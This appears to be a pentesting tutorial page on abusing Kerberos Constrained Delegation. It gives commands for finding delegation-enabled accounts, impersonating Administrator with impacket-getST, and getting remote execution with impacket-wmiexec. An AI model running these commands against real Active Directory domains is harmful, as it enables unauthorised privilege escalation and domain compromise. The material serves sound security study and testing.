Constrained Delegation Attack

If a compromised account has the Kerberos Constrained Delegation right, the account may impersonate another user to request Kerberos service ticket and use it for such as signin services.

Investigation

Check if Kerberos Constrained Delegation Enabled for User

Reference: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation#prerequisites

Get-NetUser -TrustedToAuth

Exploit

1. Request Service Ticket for Another User

The target SPN needs to be allowed for delegation.

# -k: Use Kerberos Auth
impacket-getST -k -impersonate Administrator -spn cifs/dc.example.local example.local/UserName

2. Use the Service Ticket

After getting the service ticket, we can use it for further pentesting. We need to add the environment variable as below:

export KRB5CCNAME=`pwd`/Administrator.ccache

# Check by listing tickets.
# If the klist command not found, install it by `apt install krb5-user`
klist

# -k: Use Kerberos Auth
# -no-pass: No password
impacket-wmiexec example.local/Administrator@example.local -k -no-pass

PreviousAS-REP Roasting NextDACL (Discretionary Access Control List) Attack

Last updated 1 month ago

hashtagInvestigation

hashtagCheck if Kerberos Constrained Delegation Enabled for User

hashtagExploit

hashtag1. Request Service Ticket for Another User

hashtag2. Use the Service Ticket

Investigation

Check if Kerberos Constrained Delegation Enabled for User

Exploit

1. Request Service Ticket for Another User

2. Use the Service Ticket